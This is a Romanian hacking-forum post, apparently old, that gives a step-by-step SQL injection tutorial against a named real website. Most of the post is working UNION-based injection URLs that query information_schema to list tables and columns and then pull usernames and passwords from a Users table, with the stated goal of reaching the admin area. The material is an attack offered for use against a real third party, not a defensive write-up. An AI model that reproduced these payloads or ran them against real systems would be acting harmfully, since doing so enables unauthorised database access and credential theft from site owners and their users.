Sql injection tutorial nr 2

EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.

Lista Forumurilor Pe Tematici

EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat.

Nou pe simpatie:
irina_dragalasa la Simpatie.ro

Femeie
24 ani
Bucuresti
cauta Barbat
26 - 65 ani

EliteHackers / Windows - Hacking & Tools / Sql injection[ tutorial nr 2]

Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, kooze, r3v

Autor

Mesaj

Pagini: 1

Puscas_marin
Moderator

Inregistrat: acum 18 ani
Postari: 315

[center][size=80]Sql Injection II (information_schema)[/size][/center]

Daca ati vazut celalat tutorial sigur v-ati dat sema ca nu aveti nici o sansa fara inspiratie care sa va duca la numele Tabelului si numele coloanei.Azi va voi arata cum se poate afla cu usurinta numele tuturor tabelelor si numele tuturor coloanelor....dar sa nu mai lungim vorba si sa trecem la treaba..... GO!

!!!Ca si in celalat tutorial la sfarsit va voi prezenta tot ce am facut in tutorialul acesta intr-un mic video.

Vom folosi acelasi site ca si in tutorialul precedent :

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=1

Deci in tutorialul precedent am zis ca asa arata url coplet pentru intereogarea sql

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union+all+select+1,username,3,4,5,6,7,8,9,10,11,12,13,password+from+Users/*

Acum vom presupune ca nu stim nici numele tabelului nici numele coloanelor....asa ca o sa folosim

Code:

information_schema

care are urmatoarea forma

Code:

FROM/**/information_schema.tables/columns/**/WHERE/**/table_schema='Numele bazei de date'

1.Cum imi dau seama daca funcioneaza 'information_schema' sau cum iau numele la baza de date?
R. Iformation_schema fuctioneaza pentru mysql versiunea 5.x.x(versiunea se afla folosind 'version()'), iar numele la baza de date se afla folosind 'database()'

ok avem tot ce ne trebuie numele la baza de date si versiunea ne permite sa folosim information_schema

Information_shema : "From/**/Information_schema.tables sau column/**/where/**/Table_schema='Numele bazei de date/*
Deci o sa incercam sa aflan numele tabelelor... ok

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,table_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.columns/**/where/**/table_schema='test'/*

Primul tabel a fost usor de gasit dar cum gasim restul? R.Pentru aceasta folosim "Limit"
hm nu e greu sa trecem la exemplu ca o sa intelege-ti imediat

Pentru primul tabel

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,table_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.tables/**/where/**/table_schema='test'/**/limit/**/1,1%20/*

Pentru al 2-lea tabel

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,table_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.tables/**/where/**/table_schema='test'/**/limit/**/2,1%20/*

deci ati inteles ca limit 1,1 da tabelul 1, ca 2,1 da tabelul 2 si tot asa dar ceea ce ne intereseaza pe noi este alt tabel ia sa mai incercam 1,2,3,4,5,6..........hm bigo tabel cu userii

Am gasit in Sfarsit tabelul care ne intereseaza acum sa cautam numele coloanelor care exista in el si ne intereseaza

.... la treaba...... Aceasta se face tot prin "information_schema" mumai ca de aceasta data o sa fie "information_schema.columns"
Ok noul url va arata astfel

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.columns/**/where/**/table_schema='test'/**/and/**/table_name='Users'/**/limit/**/1,1/*

Aici o sa va mentionez schimbarile facute :d
1. Din tabe_name in column_table.
2. Din information_schema.tables in information_schema.columns
3. Din */from/**/information_schema.tables/**/where/**/table_schema='test'/**/limit/**/X,1/* in*/from/**/information_schema.columns/**/where/**/table_schema='test'/**/adn/**/table_name='Users'/**/limit/**/X,1/*

Ok prima coloana..... este....username

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.columns/**/where/**/table_schema='test'/**/and/**/table_name='Users'/**/limit/**/1,1/*

Ok a doua coloana.....este.....[b]password[b]

Code:

http://www.furtherfield.org/admin/cast_fr.php?ID=-1%20union/**/all/**/select/**/1,column_name,3,4,5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.columns/**/where/**/table_schema='test'/**/and/**/table_name='Users'/**/limit/**/2,1/*

pe noi deocamdata doar aceste coloane ne intereseaza pentru aces la admin, dar daca doriti va puteti juca si dumneavoastra cu "limit" si sa gasiti alte tabele, alte coloane etc.

Video Demonstaration

_______________________________________
Deci asa se fac banii....da clik sa vezi

pus acum 17 ani

Pagini: 1

Mergi la